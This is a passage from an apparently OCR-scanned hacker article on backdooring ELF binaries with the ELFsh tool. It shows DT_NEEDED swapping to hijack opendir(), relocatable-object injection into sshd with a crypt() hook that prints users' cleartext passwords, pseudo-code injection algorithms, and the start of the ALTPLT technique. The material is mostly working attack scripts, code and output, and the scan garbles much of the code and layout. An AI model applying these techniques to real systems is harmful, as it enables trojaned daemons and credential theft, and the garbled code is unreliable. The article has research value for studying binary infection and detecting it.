such an easy technique? We can force some symbols to get resolved 
in priority over other symbols when the runtime relocation is 
done (when the .got section is patched), the runtime linker will 
iterate on the link_map [6] [7] [8] list, find the first matching 
symbol, and fill the Global Offset Table related entry (or the 
Procedure Linkage Table entry if we are on SPARC) with the 
absolute runtime address where the function is mapped. A simple 
technique consists of swapping DT_NEEDED entries and make our own 
library to be present before other libraries in the link_map 
double linked list, and symbols to be resolved before th 
original symbols. In order to call the original function from 
the hook function, we will have to use dlopen(3) and dlsym(3) so 
that we can resolve a symbol for a given object. 
Lets take the same code, and this time, write a script which can 
hijack opendir(3) to our own function(), and then call the 
original opendir(), so that the binary can be run normally: 
re ay, EGIN EXAMPLE 5-----— 
§ cat dlhijack.esh 
!/usr/bin/elfsh 
load /bin/1s 
Move DT_DEBUG into DT_NEEDED 
set 1l.dynamic[9].tag DT_NEEDED 
Put the former DI_DEBUG entry value to the first DT_NEEDED value 
set l.dynamic[9].val 1.dynamic[0].val 
Add 3 to the first DT_NEEDED value => librt.so.1l becomes rt.so.1 
add 1.dynamic[0].val 3 
save ls.new 
quit 
$ 
----- END EXAMPLE 5----- 
Now let’s write the opendir hook code: 
—---- EGIN EXAMPLE 6----- 
S$ cat myopendir.c 
include <stdio.h> 
include <sys/types.h> 
include <stdlib.h> 
include <fcntl.h> 
include <dirent.h> 
include <dlfcn.h> 
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#define LIBC_PATH "/lib/libc.so.6" 

DIR *opendir(const char *name) 

{ 


void *handle; 
void *(*sym) (const char *name) ; 


handle = dlopen(LIBC_PATH, RTLD_LAZY); 


sym = (void *) dlsym(handle, "opendir"); 
printf ("OPENDIR HIJACKED -orig- = %08X .::. -param- = %s \n", 


sym, name); 
return (sym(name) ); 


S gcc -shared myopendir.c -o rt.so.1 -ldl 


----- END EXAMPLE 6----- 


Now we can modify the binary using our 4 lines script: 


----- BEGIN EXAMPLE 7----- 
§ ./dlhijack.esh 


Welcome to The ELF shell 0.5b9 


This software is under the General Public License 
Please visit http://www.gnu.org to know about Free Software 


“load /bin/1s 
*] New object /bin/ls loaded on Fri Jul 25 02:48:19 2003 


“set 1l.dynamic[9].tag DT_NEEDED 
*] Field set succesfully 


“set 1l.dynamic[9].val 1.dynamic[0].val 
*] Field set succesfully 


“add 1.dynamic[0].val 3 
*] Field modified succesfully 


“save ls.new 
*] Object ls.new save successfully 


quit 
*] Unloading object 1 (/bin/ls) * 


Good bye ! .::. The ELF shell 0.5b9 


----- END EXAMPLE 7----- 


Let’s s the results for the original ls, and then for the 
modified ls: 


S ldd ls.new 

rt.so.1 => /lib/rt.so.1 (0x40021000) 
libc.so.6 => /lib/libc.so.6 (0x40023000) 
librt.so.1l => /lib/librt.so.1 (0x40134000) 
libdl.so.2 => /lib/libdl.so.2 (0x40146000) 
/lib/l1d-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) 
libpthread.so.0 => /lib/libpthread.so.0 (0x4014a000) 


S$ 1s 
c.so.6 dlhijack.esh dlhijack.esh™~ 1s.new myopendir.c \ 
myopendir.c” p61_ELF.txt p6l1_ELF.txt™ rt.so.1l 

S ./ls.new 
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OPENDIR HIJACKED -orig- = 400C1D5C .::. -param- = 


c.so.6 


dlhijack.esh dlhijack.esh~ 1ls.new myopendir.c \ 


myopendir.c” p61_ELF.txt p6l1_ELF.txt~™ rt.so.l 


$ 


Nice. Note that the current implementation of this technique in 
ELFsh changes the size of the binary because it injects 
automatically some symbols for binary sanity. If you want to keep 
the same size, you have to comment the calls to elfsh_fixup_symtab 
ais 

1 


in the ELFsh source code ;) . This stuff is known to be used 
in the wild. 


The dynamic version of this technique has been proposed in [9], 
where the author describes how to call dlopen() in a subversive 
WwW 
rT 


ay, so that the process get runtime linked with an extra library. 
n practice, both implementations have nothing in common, but it 
is worth mentionning. 


3. Residency : ET_REL injection into ET_EXEC 


This second technique allows to perform relinking of the iF 
ET_EXEC binary file and adding a relocatable object (ET_REL 
file aka .o file) into the program address space. This is very 

useful since it is a powerful method to inject as much data and 


code as needed in a file using a 5 lines script. 


= 
ry 
= 
ry 


Such relocation based backdoors have been developped in the 


past for static kernel patching [10 (ET_REL into vmlinuz) and 
direct LKM loading in kernel memory (ET_REL into kmem) [11] 
However, this ET_REL injection into ET_EXEC implementation is in 


my sense particulary interresting since it has been implemented 
considering a larger scope of target architectures and for 
protected environments. 


Because ELFsh is also used for things other than backdooring, 
the SHT and the symbol table are kept synchronized when we 
insert our stuff into the binary, so that symbol resolving can 
be provided even in the injected cod 


Since the backdoor needs to stay valid on a PaX protected box, 
we use 2 different injection techniques (one for the code 
sections, the other for the data sections) called section 
pre-interp injection (because we insert the new section before 
the .interp section) and section post-bss injection (because we 
insert the new section after the .bss section). 


For this second injection type, .bss data physical insertion 
into the file is necessary, since .bss is the non-initialized 
data section, it is only referenced by the SHT and PHT, but it 
is not present in the file. 


Also, note that section pre-interp injection is not possible 

with the current FreeBSD dynamic linker (some assert() kills the 
modified binary), so all sections are injected using a post-bss 
insertion on this OS. This is not an issue since FreeBSD does not 
come with non-executable protection for datapages. If such a 
protection comes in the future, we would have to modify the 
dynamic linker itself before being able to run the modified 
binary, or make the code segment writable in sh_flags. 


Let’s look at the binary layout (example is sshd, it is the same 
for all the binaries) 


EGIN EXAMPLE 8-----— 


8.txt 


$ 


e 


lfsh -f /usr/sbi 


Wed Apr 26 09:43:44 2017 


n/ss 


hd -q -s -p 


SECTION HEADER TABLE . SHT is not stripped] 
Object /usr/sbin/sshd] 
000] (nil) =) ------- fFoff:00000000 sz:00000000 link:00 
001] 0x80480f4 a-——----— .interp Foff:00000244 sz:00000019 link:00 
002] 0x8048108 a note.ABI-tag of £:00000264 sz:00000032 link:00 
003] 0x8048128 a-—-----— hash Foff:00000296 sz:00001784 link:04 
004] 0x8048820 a-—-----— dynsym Foff:00002080 sz:00003952 link:05 
005] 0x8049790 a------— dynstr Foff:00006032 sz:00002605 link:00 
006] Ox804albe a------ gnu.version Foff:00008638 sz:00000494 link:04 
007] Ox804a3ac a------ gnu.version_r of £:00009132 sz:00000096 Llink:05 
008] Ox804a40c a------ rel.got Foff:00009228 sz:00000008 link:04 
009] 0x804a414 a-—----- rel.bss Foff:00009236 sz:00000056 link:04 
010] Ox804a44c a------ rel.plt Foff:00009292 sz:00001768 link:04 
011] 0x804ab34 a-x---- .init Foff:00011060 sz:00000037 link:00 
012] 0x804ab5c a-x---- .plt fFoff:00011100 sz:00003552 link:00 
013] 0x804b940 a-x---- .text Foff:00014656 sz:00145276 lLink:00 
014] Ox806f0bc a-x---- .fini Foff:00159932 sz:00000028 link:00 
015] Ox806£0e0 a-——-----— .rodata Foff:00159968 sz:00068256 link:00 
016] Ox8080b80 aw-----— .data Foff:00228224 sz:00003048 link:00 
017] Ox8081768 aw-----— .eh_frame Foff:00231272 sz:00000004 link:00 
018] O0x808176c aw-----— ctors Foff:00231276 sz:00000008 link:00 
019] 0x8081774 aw-----— dtors fFoff:00231284 sz:00000008 link:00 
020] Ox808177c aw----— got Foff:00231292 sz:00000900 link:00 
021] 0x8081b00 aw-----— dynamic Foff:00232192 sz:00000200 link:05 
022] Ox8081lbc8  -w-----— sbss Foff:00232416 sz:00000000 link:00 
023] Ox8081lbe0 aw-----— bss Foff:00232416 sz:00025140 link:00 
024] (nil) 2 ------- .-comment Foff:00232416 sz:00002812 link:00 
025] (nil) not Foff:00235228 sz:00001480 link:00 
026] (nil) =) ------- .shstrtab Foff:00236708 sz:00000243 link:00 
O27). (mij Sapeoes .symtab foff:00236951 sz:00000400 link:00 
028] (nil) =) ------- .strtab Foff:00237351 sz:00000202 link:00 
Program header table PHT] 
Object /usr/sbin/sshd] 
0] 0x08048034 -—> 0x080480F4 r-x memsz(000192) foff(000052) filesz (000192) 
1] 0x080480F4 -> 0x08048107 r-- memsz(000019) foff(000244) filesz (000019) 
2] 0x08048000 -> Ox0807FB80 r-x memsz (228224) foff(000000) filesz (228224) 
3] Ox08080B80 -> O0x08087E14 rw- memsz (029332) foff(228224) filesz (004168) 
4] 0x08081B00 -—> 0x08081BC8 rw- memsz(000200) foff(232192) filesz (000200) 
5] 0x08048108 -—> 0x08048128 r—- memsz(000032) foff(000264) filesz (000032) 
Program header table SHT correlation] 
Object /usr/sbin/sshd] 
*] SHT is not stripped 
00 PT_PHDR 
01] PT_INTERP .interp 
02] PT_LOAD .interp .note.ABI-tag .hash .dynsym .dynstr \ 
.gnu.version .gnu.version_r .rel.got .rel.bss \ 
-rel.plt .init .plt .text .fini .rodata 
03] PT_LOAD -data .eh_frame .ctors .dtors .got .dynamic 
04 PT DYNAMIC .dynamic 
05] PT_NOTE -note.ABI-tag 
$ 
----- END EXAMPLE 8----- 


We have here two loadable segments, 
and the other is writable 


code segment) 
segment). 


What we have to do is to inject all non-writable sections before 


one is executable 
(matches the data 


(matches the 


8.txt 


S$ cat mycrypt.c 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 
#include <fcntl.h> 


int 
int 
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-interp (thus in the code segment), and all other section’s after 
-bss in the data segment. Let’s code a handler for crypt() which 
prints the clear password and exit. In this first example, we 
will use GOT redirection [12] and hijack crypt() which stays in 
the libc: 


EGIN EXAMPLE 9-----— 


glvar = 42; 
bssvar; 


char *mycrypt (const char *key, const char *salt) 


{ 


bssvar = 2; 
printf(".:: crypt redirected -key $S (Su .::. Su) \n", 


key, glvar, bssvar); 


exit (0); 


S$ gcc -c mycrypt.c 


$ cat etreladd.esh 
!'/usr/bin/elfsh 


END EXAMPLE 9---—-—-— 


Using the ’reladd’ command, we will inject mycrypt.o into sshd: 


EGIN EXAMPLE 10----- 


load /usr/sbin/sshd 
load mycrypt.o 


Inject mycrypt.o into sshd 
reladd 1 2 


Modify crypt() got entry and make it point on mycrypt() which resides 
into mycrypt.o 


set l.got[crypt] mycrypt 


save sshd.new 


quit 


S$ ./etreladd.esh 


Welcome to The ELF shell 0.5b9 


This software is under the General Public License 
Please visit http://www.gnu.org to know about Free Software 


“load /usr/sbin/sshd 


* 


* 


New object /usr/sbin/sshd loaded on Fri Jul 25 04:43:58 2003 


load mycrypt.o 
New object mycrypt.o loaded on Fri Jul 25 04:43:58 2003 


“reladd 1 2 


* 


ET_REL mycrypt.o injected succesfully in ET_EXEC /usr/sbin/sshd 


“set l.got[crypt] mycrypt 


* 


Field set succesfully 


8.txt 


“save sshd.new 


Wed Apr 26 09:43:44 2017 


[*] 


“quit 
|| 
Es] 


Unloading object 1 
Unloading object 2 


Object sshd.new sav 


successfully 


(mycrypt.o) 
(/usr/sbin/sshd) * 
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Good bye ! The ELF shell 0.5b9 
$ 
SSS IND EXAMPLE 10—---—--— 

Our script rocked. As I said, the symbol tables and the .bss from 

the module have been fused with those from the executable file 

and the SHT has been kept synchronized, so that resolving is also 

possible in the injected cod 
a ai BEGIN EXAMPLE 11----—- 
S elfsh -f sshd.new -gq -s -p 
SECTION HEADER TABLE SHT is not stripped] 
Object sshd.new] 
00] (nil) =) ------- foff:00000000 sz:00000000 link:00 
O01] 0Ox80450f4 a-x---- .orig.plt fFoff:00000244 sz:00004096 link:00 
02] O0x80460f4 a------ mycrypt.o.rodata foff:00004340 sz:00004096 link:00 
03] Ox80470f4 a-x---- mycrypt.o.text foff:00008436 sz:00004096 link:00 
04] 0x80480f4 a-—----- .interp Foff:00012532 sz:00000019 link:00 
05] 0x8048108 a note.ABI-tag fFoff:00012552 sz:00000032 link:00 
06] 0x8048128 a-—----- hash foff:00012584 sz:00001784 link:07 
07] 0x8048820 a-—----- dynsym fFoff:00014368 sz:00003952 link:08 
08] 0x8049790 a-—----- dynstr fFoff:00018320 sz:00002605 link:00 
09] Ox804albe a------ -gnu.version fFoff:00020926 sz:00000494 link:07 
10] Ox804a3ac a------ -gnu.version_r foff:00021420 sz:00000096 link:08 
11] Ox804a40c a-----—- .rel.got Foff:00021516 sz:00000008 link:07 
12] 0x804a414 a-----—- rel.bss Foff:00021524 sz:00000056 link:07 
13] 0Ox804a44c a------ rel.plt Foff:00021580 sz:00001768 Llink:07 
14] 0x804ab34 a-x---- .init Foff:00023348 sz:00000037 Llink:00 
15] Ox804ab5c a-x---- .plt fFoff:00023388 sz:00003552 link:00 
16] 0x804b940 a-x---- .text Foff:00026944 sz:00145276 link:00 
17] Ox806f0bc a-x---- .fini fFoff:00172220 sz:00000028 link:00 
18] Ox806f0eE0 a------ .rodata Foff:00172256 sz:00068256 link:00 
19] Ox8080b80 aw----- data Foff:00240512 sz:00003048 link:00 
20] 0x8081768 aw----—- eh_frame Foff:00243560 sz:00000004 Llink:00 
21] Ox808176c aw----- ctors Foff:00243564 sz:00000008 link:00 
22] 0Ox8081774 aw----- dtors foff:00243572 sz:00000008 link:00 
23] Ox808177c aw----- got Foff:00243580 sz:00000900 link:00 
24] 0x8081b00 aw----—- dynamic Foff:00244480 sz:00000200 link:08 
25] Ox8081lbc8 —-w----- sbss Foff:00244704 sz:00000000 Llink:00 
26] Ox8081lbe0 aw----- bss Foff:00244704 sz:00025144 link:00 
27] Ox8087e18 aw----- mycrypt.o.data foff:00269848 sz:00000004 link:00 
28) (Gay 6 ° asa -comment Foff:00269852 sz:00002812 link:00 
29] (nil) -not Foff:00272664 sz:00001480 link:00 
30] (nil) 9 =------ .shstrtab Foff:00274144 sz:00000300 link:00 
31] (nil)  ) ------- .symtab fFoff:00274444 sz:00004064 link:00 
32] (nil)  -=------ .strtab Foff:00278508 sz:00003423 link:00 
Program header table PHT] 
Object sshd.new] 
0] 0x08045034 —> 0x080450F4 r-x memsz(000192) foff(000052) filesz (000192) 
1] 0x080480F4 -—> 0x08048107 r-- memsz(000019) foff(012532) filesz (000019) 
2] 0x08045000 -> Ox0807FB80 r-x memsz (240512) foff(000000) filesz(240512) 
3] Ox08080B80 -> Ox08087E1C rw- memsz (029340) foff(240512) filesz (029340) 
4] 0x08081B00 —-> 0x08081BC8 rw- memsz(000200) foff(244480) filesz (000200) 
5] 0x08048108 -—> 0x08048128 r-—- memsz(000032) foff (012552) filesz (000032) 
Program header table SHT correlation] 
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Object sshd.new] 


*] SHT is not stripped 


0] PT_PHDR 

1] PT_INTERP .interp 

2] PT_LOAD -orig.plt mycrypt.o.rodata mycrypt.o.text .interp 
-note.ABI-tag .hash .dynsym .dynstr .gnu.version 
-gnu.version_r .rel.got .rel.bss .rel.plt .init 
-plt .text .fini .rodata 

[3] PT_LOAD .data .eh_frame .ctors .dtors .got .dynamic .sbss 
-bss mycrypt.o.data 

[4] PT_DYNAMIC .dynamic 

[5] PT_NOTE -note.ABI-tag 

$ 

----- END EXAMPLE 11----- 


The new sections can be easily spotted in the new SHT, since 
their name starts with the module name (mycrypt.o.*). Please 
elude the .orig.plt presence for the moment. This section 

is injected at ET_REL insertion time, but it is not used in 

this example and it will be explained as a stand-alone technique 
in the next chapter. 


We can see that the new BSS size is 4 bytes bigger than the 
original one. It is because the module BSS was only filled with 
one variable (bssvar), which was a 4 bytes sized integer since 
this specific example was done on a 32 bits architecture. The 
difficulty of this operation is to find the ET_REL object BSS 
section size, because it is set to 0 in the SHT. For this 
operation, we need to care about variable address alignement 
using the st_value field from each SHN_COMMON symbols of the 

ET REL object, as specified by the ELF reference. Details for 
this algorithm are given later in the article. 


It works on Solaris as well, even if ET_REL files generated by 
Solaris-ELF ld have no .bss section entry in the SHT. The 0.51b2 
implementation has one more limitation on Solaris, which 

is a '’Malloc problem’ happening at the first malloc() call when 
using a section post-bss injection. You dont have to use this kind 
of section injection ; ET_REL injection works well on Solaris if 
you do not use initialized global variables. This problem has been 
solved in 0.51b3 by shifting _end, _edata, and _END_ dynamic symbols 
so that they still points on the beginning of the heap (e.g. at 
the end of the last post-bss mapped section, or at the end of the 
bss, if there is no post-bss mapped section). 


Also, the .shstrtab, .symtab, and .strtab sections have been 
extended, and now contain extra symbol names, extra section names, 
and extra symbols copied from the ET_REL object. 


You can note that pre-interp injected sections base address is 
congruent getpagesize(), so that the executable segment always 
starts at the beginning of a page, as requested by the ELF 
reference. ELFsh could save some place here, instead of allocating 
the size of a page each time a section is injected, but that would 
complexify the algorithm a bit, so the congruence is kept for 

each inserted section. 


The implementation has the cool advantage of -NOT- having to move 
the original executable address space, so that no relocation of 
the original code is needed. In other words, only the .o object 
sections are relocated and we can be sure that no false positive 
relocation is possible (e.g. we -DO NOT- have to find all 
references in the sshd code and patch them because the address 
space changed). 
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This is the injected code section’s assembly dump, which contains 


the mycrypt function: 


tc aia BEGIN EXAMPLE 12----- 

S elfsh -f sshd.new -q -D mycrypt.o.text 

O80470F4 mycrypt.o.text + 0 push Sebp 

O80470F5 mycrypt.o.text + 1 mov Sesp, sebp 
O80470F7 mycrypt.o.text + 3 sub $8,%esp 
O80470FA mycrypt.o.text + 6 mov $2,<bssvar> 
08047104 mycrypt.o.text + 16 mov <bssvar>, %eax 
08047109 mycrypt.o.text + 21 push Seax 

O804710A mycrypt.o.text + 22 mov <glvar>, seax 
O804710F mycrypt.o.text + 27 push Seax 

08047110 mycrypt.o.text + 28 mov 8 (sebp) , eax 
08047113 mycrypt.o.text + 31 push seax 

08047114 mycrypt.o.text + 32 push S<mycrypt.o.rodata> 
08047119 mycrypt.o.text + 37 call <printf> 
0804711E mycrypt.o.text + 42 add $10,%esp 
08047121 mycrypt.o.text + 45 add SOxFFFFFFF4, esp 
08047124 mycrypt.o.text + 48 push $0 

08047126 mycrypt.o.text + 50 call <exit> 
0804712B mycrypt.o.text + 55 add $10, esp 
0804712E mycrypt.o.text + 58 lea 0(%esi),%esi 
08047134 mycrypt.o.text + 64 leave 

08047135 mycrypt.o.text + 65 ret 

—---- END EXAMPLE 12----- 


Lets test our new sshd: 


S$ ssh mayhem@localhost 


Enter passphrase for key ’/home/mayhem/.ssh/id_dsa’: <-- type < 
mayhem@localhost’s password: <--—- type your passwd 

Connection closed by 127.0.0.1 

$ 


Let’s verify on the server side what happened: 


S ./sshd.new -d 


ENT 


ER> 


debugl: Seeding random number generator 

debugl: sshd version OpenSSH_3.0.2p1 

debugl: private host key: #0 type O RSA1 

debugl: read PEM private key done: type RSA 

debugl: private host key: #1 type 1 RSA 

debugl: read PEM private key done: type DSA 

debugl: private host key: #2 type 2 DSA 

debugl: Bind to port 22 on 0.0.0.0. 

Server listening on 0.0.0.0 port 22. 

debugl: Server will not fork when running in debugging mode. 
Connection from 127.0.0.1 port 40619 

debugl: Client protocol version 2.0; client software version OpenSSH_3.5pl 
debugl: match: OpenSSH_3.5pl pat *OpenSSH 

Enabling compatibility mode for protocol 2.0 

debugl: Local version string SSH-2.0-OpenSSH_3.0.2p1 

debugl: Rhosts Authentication disabled, originating port 40619 not trusted 
debugl: list_hostkey_types: ssh-rsa,ssh-dss 

debugl: SSH2_MSG_KEXINIT sent 

debugl: SSH2_MSG_KEXINIT received 

debugl: kex: client->server aesl128-cbc hmac-md5 none 

debugl: kex: server->client aesl128-cbc hmac-md5 none 

debugl: SSH2_MSG_KEX_DH_GEX_REQUEST received 

debugl: SSH2_MSG_KEX_DH_GEX_GROUP sent 
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debugl: dh_gen_key: priv key bits set: 127/256 
debugl1: bits set: 1597/3191 
debugl: expecting SSH2_MSG_KEX_DH_GEX_INIT 
debugl1: bits set: 1613/3191 
debugl: SSH2_MSG_KEX_DH_GEX_REPLY sent 
debugl: kex_derive_keys 
debugl: newkeys: mode 1 
debugl: SSH2_MSG_NEWKEYS sent 
debugl: waiting for SSH2_MSG_NEWKEYS 
debugl: newkeys: mode 0 
debugl: SSH2_MSG_NEWKEYS received 
debugl: KEX done 
debugl: userauth-request for user mayhem service ssh-connection method \ 
none 
debugl: attempt 0O failures 0 
Failed none for mayhem from 127.0.0.1 port 40619 ssh2 
debugl: userauth-request for user mayhem service ssh-connection method \ 
publickey 
debugl: attempt 1 failures 1 
debugl: test whether pkalg/pkblob are acceptable 
debugl: temporarily_use_uid: 1000/31337 (e=0) 
debugl: trying public key file /home/mayhem/.ssh/authorized_keys 
debugl1: matching key found: file /home/mayhem/.ssh/authorized_keys, line 1 
debugl: restore_uid 
Postponed publickey for mayhem from 127.0.0.1 port 40619 ssh2 
debugl: userauth-request for user mayhem service ssh-connection method \ 
keyboard-interactive 
debugl: attempt 2 failures 1 
debugl: keyboard-interactive devs 
debugl: auth2_challenge: user=mayhem devs= 
debugl: kbdint_alloc: devices ’'’ 
Failed keyboard-interactive for mayhem from 127.0.0.1 port 40619 ssh2 
debugl: userauth-request for user mayhem service ssh-connection method \ 
password 
debugl: attempt 3 failures 2 
c 


rypt redirected —key mytestpasswd (42 .::. 2) 
$ 


Fine. If you want extreme details on the implementation, please 
read the ELFsh code, particulary libelfsh/relinject.c. For the 
academic audience, the pseudo-code algorithms are provided. 
Because ET_REL injection is based on BSS and Symbol table fusion, 
section pre-interp injection, section post-bss injection, 

SHT shifting, SHT entry insertion, symbol injection, and section 
data injection, all those algorithms are also available. The BSS 
physical insertion is performed only once, at the first use of 
post-bss injection. The general algorithm for ET_REL injection is 
as follow: 


1/ Fuse ET_REL and |] EXEC .bss sections 


so 
G 

= 

G 


2/ Find and inject REL allocatable sections into ET_EXEC 
3/ Synchronize ET EXEC symbol table (inject missing ET_REL symbols) 
4/ Relocate each injected section if its .rel(a) table is available 


Now let’s give some details ;) 


an an [ .:: MAIN ALGORITHM : ET_REL injection into ET_EXEC 


1/ Insert ET_REL object .bss into ET_EXEC (see BSS fusion algo) 


2/ FOREACH section in ET_REL object 
[ 


IF section is a/ allocatable (sh_flags & SHF_ALLOC) 
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b/ non-null sized (sh_size 
c/ data-typed (sh_type == S 


IF section is writable -or- OS is Free 


— Inject post-bss section into ET_EX 


!= 0) 
HT_PROGBITS) 


BSD 


EC 


ELSE 


Inject pre-interp section into 


] 


3/ Insert ET_REL 


EX} 


-symtab into ET_EXEC (symtab f 


4/ FOR! 
[ 


EACH section in ET_REL object 


IF a/ section has been injected in 2. 
b/ section needs relocation 


(same 
(.rel.sctname 


[ 


Relocate the section 


] 


BSS fusion algorithm 


usion algorithm) 


conditions) 
is found in 


REL 


ET 


— Insert ET_EXEC BSS physically if not already done (see next algo) 
FOREACH symbol from the ET_REL object 
[ 
IF symbol points into the BSS (st_shndx & SHN_COMMON) 
[ 
WHILE ET_EXEC .bss size is not aligned (sh_size % st_value) 
[ 
—- Increment by 1 the .bss size field (sh_size) 
] 
— Insert symbol w/ st_value = .bss sh_addr + .bss sh_size 
—- Add symbol size to ET_EXEC .bss size (sh_size) 
] 
] 
Rea aaas [ BSS physical insertion algorithm 
FOREACH PHT entry 
[ 
IF a/ segment is loadable (p_type == PT_LOAD) 
b/ segment is writable (p_flags & PF_W) 


Put p_memsz value into p_filesz 
End of algorithm 


ff Symbol Tab] 


les fusion algorithm 


in R 


EACH symbol] ET REL object 


IF Symbol type is function or var 


[ 


(STT_FUNC) 


iable (STT_OBJECT) 


Get parent section for this symbol using st_shndx field 


IF Parent section has been injected in 2. 


(same conditions) 
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- Add section’s base address to the symbol value 
- Inject new symbol into ET_EXEC 


eer a [ Section pre-interp injection algorithm 


— Compute section size congruent with page size 

Create new section’s header 
- Inject section header (see SHT header insertion algorithm) 
FOREACH PHT entry 
[ 


IF a/ segment type is loadable (p_type == PT_LOAD) 
b/ segment is executable (p_flags & PF_X) 


—- Add section’s size to p_filesz and p_memsz 
—- Substract section’s size from p_vaddr and p_paddr 


ELSE IF segment type is PT_PHDR 


- Substract section’s size from p_vaddr and p_paddr 


ELSE 


- Add section’s size to p_offset 


] 
—- Shift SHT (see algorithm below) 


[ Section post-bss injection algorithm 


Create new section’s header 
—- Inject section header (see SHT header insertion algorithm) 
FOREACH PHT entry 
[ 


IF a/ segment is loadable (p_type == PT_LOAD) 
b/ segment is writable (p_flags & PF_W) 


[ 


—- Add section’s size to p_memsz and p_filesz 
—- End of algorithm 


] 
] 
— Shift SHT by the section size (see next algorithm) 


Toe ee { SHT shifting algorithm 


FOREACH SHT entry 

IF current linked section (sh_link) points after new section 
— Increment by 1 the sh_link field 
IF current file offset > injected section file offset 


—- Add injected section sh_size to current sh_offset 


Ses aes [ SHT header insertion algorithm 
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Insert new section’s name into .shstrtab 
Insert new entry in SHT at requested range 

—- Increment by 1 the e_shnum field in ELF header 
FOREACH SHT entry 

[ 


IF current entry file offset is after SHT file offset 
[ 


Add e_shentsize from ELF header to current sh_offset 


] 


IF injected section header sh_offset <= SHT file offset 


-—- Add new section size (sh_size) to e_shoff field in ELF header 


IF requested new section range <= section string table index 


— Increment sh_strndx field in ELF header 


aaa ae [ Symbol injection algorithm 


—- Insert symbol name into .strtab section 
- Insert symbol entry into .symtab section 


[ Section data injection algorithm (apply to all type of section) 


— Insert data into section 
—- Add injected data size to section’s sh_size 
IF SHT file offset > section file offset 


[ 
—- Add injected data size to e_shoff in ELF header 


FOREACH SHT entry 
[ 


IF current entry sh_offset field > extended section file offset 
[ 
IF current entry sh_addr field is non-null 
[ 
- Add injected data size to sh_addr 
] 
- Add injected data size to sh_offset 
] 
] 
IF extended section sh_addr is non-null 
[ 
FOREACH symbol table entry 
[ 


IF symbol points after extended section former upper bound 


[ 
—- Add injected data size to st_value field 


] 


The relocation (step 4) algorithm wont be detailed, because it is 

already all explained in the ELF reference. In short, the relocation 
process consists in updating all the addresses references in the 

injected ET_REL code, using the available merged symbol tables in 
1B 
be 
rT 


he ET_EXEC file. There are 12 relocation types on INTEL and 56 
elocations types on SPARC, however, only 2 types are mostly used on 
NTEL, and only 3 on SPARC for ET_REL objects. 
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This last stage is a switch/case based algorithm, which has in 

charge to update some bytes, many times, in each injected mapped 
section. The relocation tables contains all the information necessary 
for this operation, their name is .rel.<target> (or .rela.<target> on 
SPARC), with <target> beeing the section which is going to be 
relocated using this table). Those sections can be easily found just 
parsing the SHT and looking for sections whoose st_type is SHT_REL 
(or SHT_RELA on SPARC). 


What makes the ELFsh relocation engine powerful, is the using of both 
symbol table (.symtab and .dynsym), which means that the injected 
code can resolve symbols from the executable itself, e.g. it is 
possible to call the core functions of the executable, as well 

as existing .plt entries from the backdoor code, if their symbol 
value is available. For more details about the relocation step, 
please look at the ELFsh code in libelfsh/relinject.c, particulary 

at the elfsh_relocate_i386 and and elfsh_relocate_sparc. 


As suggested in the previous paragraph, ELFsh has a limitation since 
it is not possible to call functions not already present in the 
binary. If we want to call such functions, we would have to add 
information for the dynamic linker, so that the function address can 
be resolved in runtime using the standard GOT/PLT mechanism. It 
would requires .got, .plt, .rel.plt, .dynsym, .dynstr, and .hash 
extensions, which is not trivial when we dont want to move the 
binary data and code zones from their original addresses. 


Since relocation information is not available for ET_EXEC ELF 
objects, we woulnt be sure that our reconstructed relocation 
information would be 100% exact, without having a very strong and 
powerful dataflow analysis engine. This was proved by modremap 
(modules/modremap.c) written by spacewalkr, which is a 
SHT/PHT/symtab shifter. Coupled to the ELFsh relocation finder 
(vm/findrel.c), this module can remap a ET_EXEC binary in another 
lace of the address space. This is known to work for /bin/ls and 
arious /bin/* but bigger binaries like ssh/sshd cannot be relocated 
sing this technique, because valid pointers double words are not 
lways real pointers in such bins (false positives happen in hash 
values). 


9 co <'d 


For this reason, we dont want to move ET_EXEC section’s from their 
original place. Instead, it is probably possible to add extra 
sections and use big offsets from the absolute addresses stored 
into .dynamic, but this feature is not yet provided. A careful 
choice of external functions hijacking is usually enough to get rid 
of the non-present symbol problem, even if this ’extra-function 
resolving’ feature will probably be implemented in the future. For 
some sections like .hash, it may be necessary to do a copy of the 
original section after .bss and change the referenced address in 
the .dynamic section, so that we can extend the hash without moving 
any original code or data. 


—------ [ 4. Infection : ALTPLT technique 


Now that we have a decent residency technique in ET_REL injection, 
let’s focus on a new better infection technique than GOT redirection 
and PLT infection : the ALTPLT technique. This new technique takes 
advantage of the symbol based function address resolving of the 
previous technique, as detailed below. 


ALTPLT is an improvement of PLT infection technique. Silvio Cesare 
describes how to modify the .plt section, in order to redirect 
function calls to library onto another code, so called the hook 
code. From [4], the algorithm of original .plt infection: 
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%< %< %< %< B< B< 


'’ The algorithm at the entry point code is as follows... 


* mark the text segment writable 
save the PLT(GOT) entry 
replace the PLT(GOT) entry with the address of the new libcall 


The algorithm in the new library call is as follows... 


do the payload of the new libcall 
restore the original PLT(GOT) entry 
call the libcall 
save the PLT(GOT) entry again (if it is changed) 

replace the PLT(GOT) entry with the address of the new libcall ’’ 


+ + F F 


< < 


< < 


ole 
ol? 
oe 
ole 
ole 


< S< 


The implementation of such an algorithm was presented in x86 
assembly language using segment padding residency. This technique 
is not enough because: 


1/ It is architecture dependant 

2/ Strict segments rights may not be kept consistant (PaX unsafe) 

3/ The general layout of the technique lacks a formal interface 
The new ALTPLT technique consists of copying the Procedure Linkage 
Table (.plt) to an alternative section, called .orig.plt, using a 
pre-interp injection, so that it resides in the read-only code 
segment. For each entry of the .orig.plt, we create and inject a 
new reference symbol, which name the same as the .plt entry symbol 
at the same index, except that it starts by ’old_’. 


Using this layout, we are able to perform standard PLT infection on 
the original .plt section, but instead of having a complex 
architecture dependant hook code, we use an injected function 
residing in hook.o.text, which is the text section of an ET_REL 
module that was injected using the technique described in the 
previous part of the paper. 


This way, we can still call the original function using 
old_funcname(), since the injected symbol will be available for 
the relocation engine, as described in the ET_REL injection 
algorithm ;). 


We keep the GOT/PLT mechanism intact and we rely on it to provide 

a normal function address resolution, like in every dynamic 
executable files. The .got section will now be unique for both .plt 
and .orig.plt sections. The added section .orig.plt is a strict copy 
of the original .plt, and will not ever be overwritten. In other 
words, .orig.plt is PaX safe. The only difference will be that 
original .plt entries may not use .got, but might be redirected on 
another routine using a direct branchement instruction. 


Let’s look at an example where the puts() function is hijacked, and 
the puts_troj() function is called instead. 
On INTEL: 


-BEGIN EXAMPLE 13----- 


_puts + 0 jmp *<_GLOBAL_OFFSET_TABLE_ + 20> FF 25 00 97 04 08 
